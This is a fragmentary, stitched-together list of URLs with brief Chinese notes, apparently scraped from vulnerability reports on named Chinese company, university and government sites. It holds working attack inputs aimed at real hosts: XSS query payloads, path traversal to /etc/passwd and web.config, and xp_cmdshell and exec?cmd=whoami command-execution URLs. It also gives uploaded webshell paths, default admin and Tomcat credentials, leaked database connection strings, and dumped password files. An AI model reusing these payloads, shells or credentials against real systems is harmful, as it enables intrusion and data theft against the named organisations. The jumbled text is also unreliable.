http://**.**.**.**/teacher.asp?B=10&S=4 http://**.**.**.**/news_view.asp?ID=540 http://**.**.**.**/download.asp?B=14&S=7 http://**.**.**.**/content_type.asp?B=36&S=55 http://c1.t3.com.cn:7001/ http://**.**.**.**/messager/users.data可以获取到所有员工信息的base64编码后的数据,通过base64解码: http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=591441973&ch=wap3.se.wa.re.an1&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=272615006&ch=wap3.se.wa.re.an2&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=184961373&ch=wap3.se.wa.re.ann&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=361945477&ch=wap3.se.wa.re.ann&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=368729891&ch=wap3.se.wa.re.ann&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://121.49.98.253:8080 http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn http://contentrecommend.mobile.sina.cn@123.57.73.3/wb.php http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn%40123.57.73.3%2Fwb.php http://123.57.73.3/wb.php http://210.41.225.141:8080/Index.aspx http://**.**.**.**/Info/news_view.asp?id=172 http://**.**.**.**/ http://web.cfae.cn/index1.jsp http://web.cfae.cn/login1.jsp?siteId=testaaa&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=testabc&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=agri&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=beta&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=bjttsc&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=jgdw&Language=Chinese http://m.flyertrip.com/index.php/Admin/Login/login http://training.tsinghua.edu.cn/vote/view/login.jsp t.cn/RUmS2UC http://wenwen.sogou.com/qunapp/new-remind/ http://**.**.**.**/bugs/wooyun-2010-095464 http://**.**.**.**/component_news/zcfc_index.php?tn=zcfc http://**.**.**.**/news/?tn=news http://**.**.**.**/OnlineQuestion.aspx?key=3dd9255b-758c-4198-9b08-9924acd64ba6 http://**.**.**.**/user/login http://**.**.**.**/user/login http://manage.st.octmami.com/wap/detail/index?goods=2926 http://180.97.34.130:8000 http://180.97.34.130:8000/pano.gate.html#/search http://180.97.34.130:8000/pano.correct.html http://**.**.**.**:59009/VIPNMS/login.action存在命令执行漏洞 http://c2.t3.com.cn:7001 http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html www.huayiyuan.com http://act.07073.com/index/index?act=txhc_20151210&mod=screenshot&fun=getMyImageStatus url:email.gee.com.cn http://**.**.**.**/bh_news.display.php?id=620 http://**.**.**.**/bh_news.display.php?id=620 https://**.**.**.**/ http://**.**.**.**/gps/doif/myLogin.jsp http://wbgh.youxinpai.com/login/ http://**.**.**.**/bugs/wooyun-2010-0145656 http://**.**.**.**:8001/console http://**.**.**.**/bugs/wooyun-2015-0160216。今天早上想了一下,会不会是同一个技术提供商做的通用服务。于是。发现了西安新势力网络。 http://**.**.**.**/index.html http://**.**.**.**/xtw/shye/Personnel_news.asp?id=31&bh=3404 http://**.**.**.**/YuanBu_elegant_demeanour.asp?id=120&bh=12585 http://**.**.**.**/News_center.asp?id=19&bh=1365 http://**.**.**.**/Shiyanshi_News.asp?id=13&bh=195 http://**.**.**.**/Recruitment_of_students_employment.asp?id=32&bh=1380 http://**.**.**.**/user/City_ajax.aspx?CityId=798729681522 http://admin.hp1997.com http://**.**.**.** http://**.**.**.** http://**.**.**.**/service.asmx hzbank.com.cn/123456 hzbank.com.cn/123456 hzbank.com.cn/hzbankhr123 hzbank.com.cn/hzbankhr123,但因登录时需要扫描二维码无法登录; http://www.spider.com.cn/userlogin.html?returnurl=http%3A%2F%2Fwww.spider.com.cn%2F此处接口验证码设计缺陷,输入正确一次一直正确,可以绕过验证码 http://b2b.chinalh.com/login/ http://218.1.100.235 http://**.**.**.** http://**.**.**.**/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://**.**.**.**/user/login.aspx http://**.**.**.**/Account/LogOn http://**.**.**.**/ https://mail.ceair.com http://union.ceair.com/ http://airport.csair.com/SelfMonitoring/CussMain.do?method=selectData&city=ALL http://safety.ceair.com:7500/sms/sms/safty/employeereport/emReportHome.zul http://oa.daojia.58.com http://www.cjn.cn/ http://220.194.29.181:7001/console/login/LoginForm.jsp存在Java反序列化漏洞 http://121.43.74.72:7005/tit-ydcd/ http://121.43.74.72:7005/ca/ma3.jsp jdbc:mysql://rdsx89pe30tuivsptgpa1.mysql.rds.aliyuncs.com:3306/dyxptdb?zeroDateTimeBehavior=convertToNull http://**.**.**.**:44445/NetInfo/ViewIpPwd.aspx http://**.**.**.**:6888/userAction.struts?actionType=entrySystem http://**.**.**.**:6888/deployLogin.struts http://**.**.**.**:44401/(ie访问比较好) user:admin user:admin pass:admin http://**.**.**.**/ http://**.**.**.**:80/ url:http://121.41.30.169:8080/manager/html user:tomcat pass:tomcat http://project.haier.net http://**.**.**.**/ http://www.lesuke.com/getPwd.jsp http://**.**.**.**/about/news/news_view.php?id=213 http://**.**.**.**/login.aspx http://**.**.**.**/index.html http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/data.rar http://t.cjn.cn/user/login.php http://**.**.**.**/index.php?m=content&c=index&a=lists&catid=18 http://xj.ad.sogou.com/adinsp/user/index http://**.**.**.**/Infor/LostAndFound.aspx http://**.**.**.**/ http://**.**.**.** http://weixin.hztraining.com/ www.hzmedia.com.cn http://weixin.hztraining.com/w/reader.aspx?id=983fa362-6a0c-4aa8-9788-8f7281ebf007_1 http://weixin.hztraining.com http://demo.kalcaddle.com/index.php?user/loginSubmit http://demo.kalcaddle.com/data/kodbox/index.php,可以看到网站根目录: mba.cup.edu.cn/search/index/?key=gg http://oa.sy-yy.com:8989/wap/login.jsp http://oa.sinopharmholding.com/ http://**.**.**.**//newlist.php?leixing= http://www.longone.com.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.longone.com.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://dev.gfan.com http://bbs.gfan.com/ www.sdcofco.com http://rtx.800bestex.com:8012/ http://rtx.800bestex.com:8012/admin.php http://rtx.800bestex.com:8012/selectdept.php http://rtx.800bestex.com:8012/rtxcsetup.exe http://www.gufensoso.com/search/?q=intitle%3A%22GourdScan%22 http://www.olfushi.com/ http://www.youziyu.com但是这个还没有。 http://ilife.homelink.com.cn/aigou/admin.php?m=Index&a=login http://open.shopex.cn/.git/ http://**.**.**.**/index.php?option=mainmenu&task=showpage&id=11 http://www.zf_**.**.**.**/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soapenc="http://**.**.**.**/soap/encoding/ xmlns:tns="http://**.**.**.**/ xmlns:types="http://**.**.**.**/encodedTypes xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body soap:encodingStyle="http://**.**.**.**/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_**.**.**.**/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope http://**.**.**.**/ForgetPwd.action存在命令执行漏洞 http://**.**.**.**/news_show.asp?UidA=6&UidB=16&id=1024 http://**.**.**.**/news_cx.asp?cx_1=1&cx_2=66&cx_3=1&cx_4=title&cx_5=addtime&cx_6= http://**.**.**.**/zxQuestion.aspx?DoctorID=1 http://**.**.**.**/upfiles/8f5560a8-a0f4-45e0-a073-631c1a049156.aspx http://zsjyxy.scnucas.com/system/about/indexDetails.asp?Id=1 http://zsjyxy.scnucas.com/adminuser/login.asp http://mall.juran.cn/myspace/userinfo/taddresses.htm http://mall.juran.cn http://shouyou.sogou.com/download.html?gid=wan_1570&source=shouyou.sogou.com%27*%23 http://**.**.**.**/ http://219.143.252.185 http://**.**.**.**/shownews.asp?id=410 user:admin password:123456 https://github.com/LeeAce/FASystem http://www.hydron.com.cn/product.php?id=1 http://www.ytzq.com/main/index.shtml https://service.ytzq.com/service/cgi-bin/ytzq/cfzj/sso/action/LostPasswordAction?function=resetPassword http://support.chanjet.com/ http://ka.gfan.com/### http://**.**.**.**/PMS/ http://**.**.**.**:8002/logonAction.do?actionType=newlogon http://**.**.**.**/ http://**.**.**.**/webroot/article.php?art=612 http://www.mlairport.com/autoweb/autoweb/ml_index.html http://www.mlairport.com/autoportal/AlbumUpload http://www.mlairport.com/autoportal/AlbumUpload http://office.lbxdrugs.com/seeyon//logs/login.log http://office.lbxdrugs.com/seeyon/ http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=orderdetail&oid=1449916178 http://**.**.**.**/login http://**.**.**.**/wap/user!forgetPwd.action存在命令执行漏洞 http://jw.tjrac.edu.cn/ http://**.**.**.**/zxDeptList.aspx?Dept=%C9%F1%BE%AD%C4%DA%BF%C6 http://**.**.**.**/plHealthWikiInfo.aspx?ID=74 http://**.**.**.**/data/admin/ver.txt http://**.**.**.**/include/dialog/select_soft_post.php http://game.weibo.com/site/user/ajaxFollow http://game.weibo.com/home/user/ajaxFollow http://book.weibo.com/newcms/i/weibo_relation.php http://game.weibo.com/site/user/ajaxFollow http://**.**.**.**/bugs/wooyun-2014-073731。。。上次是万能密码登录,这次是弱口令 https://imt.rajax.me http://**.**.**.**:16080/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin schedule:x:500:500::/home/schedule:/bin/bash pos:x:501:501::/home/pos:/bin/bash webpolicy:x:502:502::/home/webpolicy:/bin/bash jygx:x:503:503::/home/jygx:/bin/bash jhcard:x:504:504::/home/jhcard:/bin/bash catlog:x:505:505::/app/webpolicy/jboss-4.0.4.GA/server/default:/bin/bash secheck:x:20001:20001::/home/secheck:/bin/bash http://202.108.145.52/ http://**.**.**.**/ http://**.**.**.**/wooyun/index.jsp http://union.ceair.com/web/ResetPassWord.aspx?loginuser=xxxx http://**.**.**.**/ http://**.**.**.**//tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**,端口是443: http://lianjie.crland.com.hk/Webs/HR/News_list.aspx?type=k http://www.svwstar.com/epms/ http://**.**.**.**/images/data_bak/120/G/ http://**.**.**.**/images/data_bak/120/G/Microsoft%20SQL%20Server/ http://**.**.**.**/images/data_bak/120/G/database/%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%87%E4%BB%BD/ http://**.**.**.**/images/data_bak/120/F/%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9/ http://**.**.**.**/userreg.aspx?u=20130925003 http://210.22.85.50/ http://116.236.253.178/ http://**.**.**.**:7001/index/openRoad.do http://**.**.**.**:7001/test.jsp http://**.**.**.**/ http://tianjin.daojia.com.cn/food_search.php?a=2&r=5069&char=A http://pm.feihe.com/GetPassWord.aspx http://community.edufe.com.cn/space/index.php?blogid=105684 http://121.14.65.115:8080/she11.jsp http://121.14.65.116:8080/she11.jsp http://121.14.65.117:8080/she11.jsp http://**.**.**.**/tw/ http://**.**.**.**/tw/newspost.php?id=3778 http://**.**.**.**/defaultroot/public/jsp/singleupload.jsp?path=desktop&visualName=unitImgName&hiddenName=unitImgSaveName&del=yes http://**.**.**.**/defaultroot/upload/desktop/2015121300213481202609893.jsp http://219.143.230.132:8080/slrs/login_login.action http://plf.kingreader.com/Frameworks/Admin/Security/UserLogin.aspx?refer=http%3a%2f%2fplf.kingreader.com%2fDefault.aspx http://ubc.ecnu.edu.cn/front/artical_preview.php?tag_ID=5&&action=moduleArts&&page=5&&pageRange=1 http://itcs.ecnu.edu.cn/ http://itcs.ecnu.edu.cn:80/ http://www.letv.com/ http://m.letv.com/ http://mail.huatu.com/ http://**.**.**.**/news_detail.php?d=1241 http://**.**.**.**/file/fileView.action?fileInfo.state=0&userFile.FId=209&userFile.id=8031 http://www.edufe.com.cn/special/mxxhg2014/show.php?contentid=1710 http://**.**.**.**:9000/wcm/app/login.jsp http://**.**.**.**:9000/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin http://**.**.**.**:9000/wcm/app/login.jsp即完成绕过 http://**.**.**.**:9000/wcm/services http://media.ecnu.edu.cn/.git/ http://202.120.83.100/sggl/wsjj/index.jsp?mainpath=zcgysDetails.jsp?flag=201305280003835721 http://202.120.83.100/sggl/wsjj/index.jsp?mainpath=../../WEB-INF/web.xml http://202.120.85.11:8080 http://202.120.88.141 http://www.fblife.com/ajax.php?a=change&c=news&id=159828&ids=159828&pages=10&pagesize=6&t=1449712075984&tags=%E7%A6%8F%E7%89%B9 http://news.fblife.com/ajax.php?a=change&c=news&id=165338&ids=165338&pages=10&pagesize=6&t=1449710700034&tags=%E6%8D%B7%E8%B1%B9F-PACE%20%E5%B9%BF%E5%B7%9E%E8%BD%A6%E5%B1%95 http://fax1.sfn.cn/Admin/login.aspx http://fax1.sfn.cn http://**.**.**.**/index.php?Act=article&PK=19&MK=44 http://**.**.**.**/liveroom/Handler/Default.ashx?action=GetSubjectList&isVisible=true&pageIndex=1&pageSize=5&guid=1449942744338&orderExpression=PublishTime+DESC http://xlzx.nju.edu.cn/ http://xlzx.nju.edu.cn/inc/upload.asp?fl=1.asp;1 http://hxlm.xmu.edu.cn/ http://www.qxzxp.com/3019.html http://222.24.192.146/ http://**.**.**.**/web/find.aspx?Key=% http://220.112.36.116:8080/login.action http://spxy.swu.edu.cn/ http://baoxian.jrzj.com/index.php?m=insurance&c=index&a=viewpdf&planId=516 http://**.**.**.**/UploadFiles/201511221243487465.cer http://**.**.**.**/AdminManage/Login.aspx http://**.**.**.**/AdminManage/frame/Main.aspx http://**.**.**.**//UploadFiles/2015112212215962665.cer http://**.**.**.**/AdminManage/Login.aspx http://zhichi.ufida.com.cn/jinrong/ http://zhichi.ufida.com.cn/jinrong/ErrorPage.aspx?aspxerrorpath=/jinrong/WebManage/UserLogon.aspx http://zhichi.ufida.com.cn/jinrong/ http://**.**.**.**/misc.php?mod=syscode&pnumber=1 http://**.**.**.**/misc.php?mod=syscode&pnumber=1 http://oa.buwei.co//misc.php?mod=syscode&pnumber=1 ftp://14.23.175.4/ http://www.hrth806.com/admin/left.aspx http://www.hrth806.com/Login.aspx http://**.**.**.** https://mail.tcl.com/owa/ http://gouuse.xinnet.com/ http://pols.ecnu.edu.cn http://pols.ecnu.edu.cn/admin/admin.php http://arc.ecnu.edu.cn/news/manage/login/login.asp http://eng.ecnu.edu.cn/ http://eng.ecnu.edu.cn/news-show.php?id=51 http://mail.faw.com.cn/ http://**.**.**.**/oa/HX_manage http://us.autonavi.com http://us.autonavi.com/navisoftware/tips root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System bus:/:/sbin/nologinvcsa:x:69:69:virtual owner:/dev:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinsaslauth:x:499:76:"Saslauthd saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologinbacula:x:133:133:Bacula System:/var/spool/bacula:/sbin/nologinradiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologindovenull:x:498:499:Dovecot's user:/usr/libexec/dovecot:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinqpidd:x:497:498:Owner Daemons:/var/lib/qpidd:/sbin/nologinautonavi:x:500:500::/home/autonavi:/bin/bashnagios:x:501:501::/home/nagios:/sbin/nologinzabbix:x:502:502::/home/zabbix:/bin/bashzongning:x:503:503::/home/zongning:/bin/bash http://sunsunplus.51.net/text.php?tid=1292 http://mail.faw.com.cn/ http://chr.sdu.edu.cn/admin/login.htm http://www.guoshi.com/css/index.css/%20\0.php http://science.guoshi.com/skin/2/main.css%00.php http://ketan.guoshi.com/cssnew/basic.css%00.php http://weibo.guoshi.com/style/main.css%00.php http://122.224.232.58/ http://b.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1449954143596 http://tiku.huatu.com/index.php?mod=user&act=login http://wbgh.youxinpai.com/login http://**.**.**.**/content/24380 http://**.**.**.**/index.php/Public/login.shtml url:http://218.241.230.35:80/manager/html user:tomcat pass:tomcat http://218.241.230.35/wooyun/ http://**.**.**.**/bns/query/Query/ipwhoisQuery.do?txtquery=**.**.**.**&queryOption=ipv4 http://**.**.**.**/ user:admin pass:admin http://**.**.**.**:8080/welcome.action存在命令执行漏洞 http://202.104.30.113:8080/ http://mail.huatu.com http://219.141.242.77:7777/pe-admin/ http://219.141.242.77:7777/pe-admin/main.jsp http://youxi.baidu.com/developerDemo/demo.jsp http://wbgh.youxinpai.com http://**.**.**.**/zhuanr_info.jsp?proid=a506ebff-a209-11e5-896b-40f2e925905a http://58.20.40.247:7001/duizhang/ http://58.20.40.247:7001/console/ https://61.187.87.92/ http://61.187.87.92:7001/console www.fxhotels.com主站存在SQL注入: http://www.fxhotels.com/index.aspx http://www.fxhotels.com/addhotels.aspx http://61.184.32.10:8888/ http://219.141.214.23:8091 cn:88使用的是weblogic,但是该版本还存在java反序列化漏洞。 http://218.87.194.57:8080/suppler/login/login_login.action http://218.87.194.57:8080/suppler/user/config.jsp http://218.87.194.57:8080/suppler/js/conn.jsp http://218.87.194.57:8080/suppler/js/config.jsp http://home.renhe.com/login/login_index.h http://home.renhe.com/uploads/2015/12/14/201512348124337.253.jsp http://home.renhe.com/uploads/2015/12/14/config.jsp http://home.renhe.com/js/conn.jsp http://home.renhe.com/manage.jsp Id:0;996 Package:Negotiate User:NETWORK Id:0;1100461 Package:NTLM User:rhzjzc Domain:WWW-6C265A4688B Id:0;997 Package:Negotiate User:LOCAL http://219.142.83.10/Lams/login http://**.**.**.**/ http://**.**.**.**/forgetpwd.html http://**.**.**.**/pages/ListBook.aspx?SID=1876&FID=20&SFL=B1 http://www.gifa.com.cn/wp-login.php http://**.**.**.**/yb.asp?id=7 http://**.**.**.**/page/count.asp?artid=1&jobid=&topicid= http://mail.faw.com.cn http://**.**.**.**/mainpages/more.aspx?Keywords=%2 http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js ftp://px.kysec.cn/ http://www.hk.cntaiping.com http://www.hk.cntaiping.com/include/getfile.php?filepath=路径&file=名字+格式&filename=名字 http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button= http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button= http://**.**.**.**/admin/loginAdminUser.action http://wooyun.org/bugs/wooyun-2015-0149748 http://111.203.203.1/WebContent/pay.jsp http://111.203.203.1/she33.jsp http://115.28.138.184/index.jsp,呵呵,直接把系统的密码都暴露了,I服了You http://115.28.138.184/shopxx/admin/admin!login.action存在struts2 http://sell.ips.com.cn/User/UserAddress.aspx http://sell.ips.com.cn/User/GetUsrAddressInfo.ashx http://uc.wasu.cn/wu/ http://old.homeinns.com http://mail1.dict.cn/result_list.aspx?id=20151213194359983 http://211.150.67.33:7001/console/login/LoginForm.jsp http://hq.fruitday.com:88/login/Login.jsp?logintype=1 http://jy.xmu.edu.cn/ http://jy.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82 http://**.**.**.**/Csbtv/20151109/1_1_13516.HTM http://**.**.**.**:8686/zhcsserver/AddSmsVerifyCode.action http://**.**.**.**:8686/zhcsserver/help.jsp jdbc:oracle:thin:ZHCSUSER/ZHCSUSER@**.**.**.**:1533/dbjlg jdbc:mysql**.**.**.**:13306/zhcs_test?useUnicode=true&characterEncoding=UTF-8 http://**.**.**.**:8686/zhcsserver/AddCustomer.action?verifyCode=22199&y0105=ANDROID&password=200bb762aa5503de7fdb2ec6b5cbe991&telephone=13036786808&y0103=714319473283964856&y0102=3614525008582196830&osversion=android4.2.2&appversion=1.7&connecttype=WiFi&phonetype=vivo+Y15T&setupsource=%E8%B1%8C%E8%B1%86%E8%8D%9A%E5%BC%80%E6%94%BE%E5%B9%B3%E5%8F%B0&localprovince=%E6%B9%96%E5%8D%97%E7%9C%81&localcity=%E9%95%BF%E6%B2%99%E5%B8%82&localcounty=%E6%9C%9B%E5%9F%8E%E5%8C%BA http://**.**.**.**/company/login http://210.44.176.44 http://210.44.176.45 http://210.44.176.45 http://219.143.213.248/ http://119.254.105.172:7001/jmxroot/jmxroot.jsp http://mail.huatu.com/ http://**.**.**.**/upload/download/ http://**.**.**.**/images/ http://221.6.196.57:8082/ http://221.6.196.57:8082/ModelTemplate/Details/-1 http://kybpc.chexian.sinosig.com http://**.**.**.**/n1360/n26526/26741.html http://**.**.**.**/invoker/JMXInvokerServlet未删除 http://**.**.**.**/detail.aspx?id=80272 http://**.**.**.**/xianlusearch.html?xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF http://**.**.**.**/PerformSearch.aspx?search= http://**.**.**.**/showArticle.action?artId=1410890820313 http://**.**.**.**/jpg/setEmailSender.asp http://61.184.32.10:8888/ http://61.184.32.10:8888/info/suggest.do http://**.**.**.**/listCourse.action?mcatgcd=N&scatgcd=P006 http://app.cjn.cn/apps/ http://oa.gykgah.com/yyoa/index.jsp https://**.**.**.**/ https://**.**.**.**//entry.php?action=getUserinfo2&userId=1 https://**.**.**.**//entry.php?action=getUserinfo2&userId=1 http://**.**.**.**/index.php?site=1&page_id=30&ids=733 http://www.scrcoa.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://59.57.252.59 http://m.iiyi.com/login/ http://cts.tcl.com/../admin/index.aspx http://cts.tcl.com/admin/ http://cts.tcl.com/admin/system/system.aspx http://www.sunyard.com/se_result.php www.sunyard.com http://218.246.22.194:8080/vmain/login.jsp http://218.246.22.194:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27 http://api2.elnet.cn:8080/elws/axis2-admin/ http://api2.elnet.cn:8080/elws/services/Cat/exec?cmd=whoami http://oa.sy-yy.com:8989/yyoa/ http://oa.sy-yy.com:8989/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://www.sunyard.com/ http://www.sunyard.com/ www.sunyard.com http://www.bj-jhhj.com/ckfinder/ckfinder.html http://60.28.104.133:9060/yyoa/ http://60.28.104.133:9060/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://www.daojia.com.cn/review.php?a=83&r=2003 http://m.qk365.com/admin/selfservice/pay.jsp http://m.qk365.com/admin/selfservice/complaint.jsp http://**.**.**.**/members/pages.php?ID=apply http://hneta.csu.edu.cn/ http://hneta.csu.edu.cn http://1.85.40.239:8080/ index.php/openapi/pam_callback/login/module/pam_passport_basic/type/shopadmin/appid/desktop/redirect/aHR0cDovL29pbS5sYWl5aWZlbi5jb20vaW5kZXgucGhwLw%3D%3D http://oim.laiyifen.com http://www.njxt.net:8000 http://www.njxt.net:8000/scmanage/index.aspx?sid=22&uname=0022029 http://www.njxt.net:8000/scmanage/index.aspx?sid=52&uname=0193001 http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060 http://www.njxt.net:8000/image/studentimg/166/ http://www.njxt.net:8000/ashx/download.ashx?/scManage/学事通校园管理员-最新版.pdf http://www.njxt.net:8000/ashx/download.ashx?/web.config http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060 http://www.njxt.net:8000/flash/up.swf?url=/ashx/SaveFile.ashx&Img=/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx&call=FlashCall http://www.njxt.net:8000/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx http://www.njxt.net:8000/image/studentimg/166/724e49b4-b103-47af-b07e-3ad66047f93a.aspx http://www.njxt.net:8000/ashx/download.ashx?/ashx/SaveFile.ashx http://**.**.**.** http://**.**.**.**:8080/wcm/comm_fron http://www.sinoess.com/ http://www.sinoess.com/loginAction!redirect.action http://www.sinoess.com/con1.jsp http://www.yunbaoxiao.net:80/resetEmailPwd?username=&start= http://www.yunbaoxiao.net/login http://www.yunbaoxiao.net:80/resetEmailPwd?username=d2Vpd2FuZ0BjcmVkaXRlYXNlLmNu&start=MjAxNS0xMi0xNCAxNzowNzo0Mg== http://**.**.**.**/album/albumBefAction?doit=show&mbr_no=331161&no=307044 http://www.vcangene.com/vcangene/site.jsp http://118.193.11.70 http://host/homepage.php/账号/member-profile http://**.**.**.**/homepage.php/admin/member-profile http://**.**.**.**/syportal/login http://**.**.**.**/syportal/login http://m.ac.qq.com/ http://pan.baidu.com/s/1sjSuQwl http://**.**.**.**/News/news.aspx?id=1%27 http://cemftp.ce-air.com/yyoa/index.jsp http://dealer.xcar.com.cn/dealerdp_index.php?r=inner/DealerApp/GetSmsPwd/uname/15812448662/security/abc1214567/type/3 http://www.daojia.com.cn/restaurant.php?a=53&r=3657 http://**.**.**.**/Home/Search?keywords=1 http://218.58.70.201:8080/haier http://218.58.70.201:8080/ http://202.104.30.113:8000 http://202.104.30.113:8000/uddiexplorer/发现存在uddi,尝试了下ssrf内网的嗅探 http://202.104.30.113:8000/uddiexplorer/SetupUDDIExplorer.jsp页面泄露了内网的地址段,试起来 http://**.**.**.**/teachwebsl/login.aspx http://218.241.131.229/dcwork/ http://218.241.131.229/invoker/JMXInvokerServlet直接部署shell http://218.241.131.229/is/index.jsp http://oa.bjgold.com.cn http://oa.bjgold.com.cn//pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://kh.gw.com.cn/ http://111.203.203.24:8080/WebContent/addECPolicy/kuaisutoubao.jsp http://111.203.203.24:8080/ ROOT.WAR/shell.jsp http://111.203.203.24:8080/she11.jsp http://111.203.203.25:8080/WebContent/addECPolicy/kuaisutoubao.jsp http://111.203.203.25:8080/she11.jsp http://git.csdn.net/ http://hr.hitsz.edu.cn/rsc/infoDetail.php?id=471 